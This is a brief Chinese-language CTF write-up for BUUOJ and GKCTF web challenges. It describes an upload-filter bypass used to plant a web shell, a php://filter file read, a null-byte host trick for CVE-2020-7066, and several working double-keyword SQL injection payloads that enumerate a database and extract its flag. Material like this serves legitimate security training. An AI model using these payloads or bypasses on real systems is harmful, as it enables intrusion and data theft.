buuoj
极客大挑战 upload
.正常上传后会提示not image,同时php后缀也被过滤
可以构造成这样上传
知识点:
1.改Content-Type绕过检测
2.可以用.phtml结尾代替php
3.加GIF图片头,scri绕过<?的检测
菜刀得flag
knife
直接菜刀得flag
Secret File
三次套娃,最后
因为涉及过滤了input和data,但是没过滤filter,可以用php://filter伪协议拿到flag
babysql
只有双写过滤,先试出来有三个字段,payload:
username=admin&password=pwd ’ ununionion seselectlect 1,2,group_concat(schema_name) frofromm (infoorrmation_schema.schemata)%23
username=admin&password=pwd%20%27%20ununionion%20seselectlect%201,2,group_concat(table_name)frfromom(infoorrmation_schema.tables)whwhereere%20table_schema=%22ctf%22%20%23
username=admin&password=pwd ’ ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_name=“Flag”%23
http://9464e50d-065e-482f-8cf1-f49856e4cf6d.node3.buuoj.cn/check.php?username=admin&password=pwd%20%27%20ununionion%20seselectlect%201,2,flag%20frfromom(ctf.Flag)%23
[GKCTF2020]cve版签到
hint cve-2020-7066
Tips: Host must be end with ‘123’
脑洞要访问127.0.0.123
构造?url=http://127.0.0.123%00.ctfhub.com,将后面截断,访问到有flag的网页
GKCTF pokemon
玩游戏,绿宝石,有点意思
[GKCTF2020]小学生的密码学
仿射加密
在线解密即可